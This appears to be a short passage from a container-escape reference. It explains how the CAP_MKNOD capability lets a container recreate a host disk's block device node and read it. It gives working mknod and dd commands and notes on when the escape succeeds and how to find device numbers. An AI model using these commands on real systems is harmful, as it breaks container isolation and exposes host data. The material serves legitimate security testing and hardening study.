CAP_MKNOD lets the container create device nodes. Because a device node is just a major and minor number, the container can create a node for a host disk that was never granted to it, then read or mount that device.
capsh --print | grep -q cap_mknod && echo have
# Recreate the host root block device by its major:minor and read it
mknod /dev/hostsda b 8 1 && dd if=/dev/hostsda bs=1M count=1 2>/dev/null | file -
Exploitation notes#
- The default Docker cgroup device policy denies access to unlisted devices even if the node exists, so
mknodescapes work where that policy is loosened or in a privileged container. - Determine the target major:minor from a readable
/proc/partitionson the host or from known defaults (8:0 for the first SCSI/SATA disk). - Once the node is readable, continue as in Host block device.